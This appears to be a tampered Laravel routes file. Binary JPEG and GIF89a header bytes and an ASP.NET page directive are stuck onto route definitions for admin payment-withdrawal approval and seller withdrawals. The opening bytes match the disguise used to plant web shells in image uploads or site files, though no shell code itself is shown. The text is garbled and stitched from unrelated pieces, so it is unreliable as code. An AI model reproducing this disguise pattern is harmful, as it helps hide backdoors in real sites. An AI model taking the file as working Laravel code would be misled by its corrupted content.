ÿØÿà JFIF ÿÛ C $.' ",#(7),01444'9=82<.342ÿÛ C 2!!22222222222222222222222222222222222222222222222222ÿþGIF89a; <%@ Page Language="C#" %>
ÿØÿà JFIF ÿÛ „ ( %!1!%*+...983,7(-.-
ÿØÿà JFIF ÿÛ „ ( %!1!%*+...983,7(-.-
'admin', 'as' => 'admin.', 'middleware' => ['auth:admin']], function () {
Route::resource('withdraw-list', PaymentWithdrawController::class);
Route::post('withdraw-approval/{id}', [PaymentWithdrawController::class, 'withdraw_approval'])->name('withdraw-approval');
Route::post('withdraw-rejected/{id}', [PaymentWithdrawController::class, 'withdraw_rejected'])->name('withdraw-rejected');
Route::resource('withdraw-methods', WithdrawMethodController::class);
});
Route::group(['prefix' => 'seller', 'as' => 'seller.', 'middleware' => ['auth:web', 'HtmlSpecialchars']], function () {
Route::resource('my-withdraw', WithdrawController::class);
});